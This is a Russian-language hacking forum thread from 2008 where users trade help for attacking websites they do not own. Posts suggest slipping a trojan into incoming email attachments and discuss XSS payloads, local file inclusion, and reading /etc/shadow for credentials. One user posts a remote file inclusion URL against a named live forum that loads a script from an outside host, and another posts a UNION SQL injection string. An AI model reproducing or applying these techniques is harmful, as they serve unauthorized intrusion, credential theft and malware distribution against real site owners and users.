Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    отслеживай все входящие письма и если придет аттач с каким-либо исполняемым файлом прикрепи к нему троян раньше чем он прочитает это письмо
     
  2. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    на одном сайте с помощью конструкции &#60script>alert('xss')&#60/script#x3E; в теле обьявы появляется <script>alert()</script> но алерт не вылезает. не судьба?))
     
  3. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    в браузере видешь как надо, а в коде заменяется специальные символы и нечего не исполняется.
    это такая функция в пхп : htmlspecialchars — Преобразует специальные символы в HTML сущности
    Короче в этом месте хсс можешь не искать)
     
  4. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    простите, возможно не в ту тему запостил..
    нашол уязвимость форматирование строки..
    где можно прочитать про єто, и как заюзать?
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    eLWAux Если ТЫ нашёл уязвимость, то это ТЫ должен описать метод её реализации и получить за это респекты, а не спрашивать. :)
     
  6. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    1.нашел ее не ты а xSpider (или что нить аналогичное)
    2. гугл все отлично отвечает..
     
  7. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2Grema нда пнятна) а есть вероятность то хоть что это где нить упустили на этом же сайте?))
     
  8. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    Думаю есть, я имел в виду что именно в том куске где ты пытался кинуть этот алерт хсс нету! а ты полазий по сайту может найдешь че-то интересное, хочешь, ссылку в лс посмотрим что там интересного.
     
  9. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    Нашел локальный инклюд залил картинку с пхп кодом, но нуль байт не прокатывает чё делать?
    Движёк самописный
    Код скорее всево такой
    PHP:
    if(file_exists($patch.'/'.$file.'.php')){
        include(
    $patch.'/'.$file.'.php');
    }
     
  10. none222

    none222 Guest

    Reputations:
    0
    а ты ничего и не сможешь делать, кроме как инклудить пхп файлы, который защищены, например ХТАККЕССОМ, и искать в них новые баги - но это ещё и от везения зависит;)
     
  11. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2Grema ога попозже) начала сам попробую))
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    эмм, попробуй поставить ?
    index.php?file=путь/к/картинке.jpg?
    хотя помойму это катит только прри удалённых инклудах
     
    2 people like this.
  13. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Да это кактит только при удалённых инклудах.

    Инлудить файл локально и передавать ему при этом параметр (через get или post) нельзя, поэтому конструкция типа ('include.php?a=1') работать не будет.

    PHP:
     if(file_exists($patch.'/'.$file.'.php')){ 
        include(
    $patch.'/'.$file.'.php'); 
    Если ты здесь можешь менять только переменную $file и %00 не прокатывает, то инклудить можно будет только файлы с расширением php.

    А если можешь менять переменную $patch, то это уже удалённый инклуд.
     
  14. Cmucl

    Cmucl Member

    Joined:
    21 Jun 2008
    Messages:
    12
    Likes Received:
    8
    Reputations:
    0
    Вопрос знатокам.
    Есть бажный сайт.Скуля,файл прив включён.Возможность просматривать все дериктории, начиная с кореневого каталога.Записать шелл через скулю не получается =(. Заливка через админку тоже не проконала.Скуль менеджер не найден(.А теперь вопрос. Где в юниксе хранятся пароли от ssh ftp итд ,что бы как-то всё-же получить доступ к сайту?
     
  15. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    /etc/passwd
    or
    GNU/Linux==/etc/shadow
    or
    freeBsd==/etc/master.passwd
    2geforse в паблике только
    http://www.securitylab.ru/poc/292387.php
     
    #3275 MaSTeR GэN, 19 Sep 2008
    Last edited: 19 Sep 2008
  16. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Cmucl, некоторые фтп демоны хранят свои пароли в мускуле и тп субд
    А от пароли юзеров, как уже сказал MaSTeR GэN, хранятся в /etc/shadow (Linux) и /etc/master.passwd (*BSD), вот только доступ к ним в 99% случаев имеет только рут
     
  17. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Продскажите плиз! PhpBB 3.0.1! Какие у него есть уязвимости?
     
  18. br3k

    br3k Elder - Старейшина

    Joined:
    19 Sep 2007
    Messages:
    130
    Likes Received:
    107
    Reputations:
    17
    http://www.milw0rm.com/exploits/3370
     
  19. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Посмотрел! И почему не работает??

    http://forum.tvingo.ru/includes/functions.php?phpbb_root_path=http://www.vkavkaz.tu2.ru/s1.php

    Я же правельно всё зделала?
     
  20. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    при запросе -1+union+select+1,2,3,4,5,6,7,8,9,0,1,2/* выдает ошибку Query failed : Illegal mix of collations (utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation 'UNION' как так?)) union же команда ее разве нада кодировать?)
     
Thread Status:
Not open for further replies.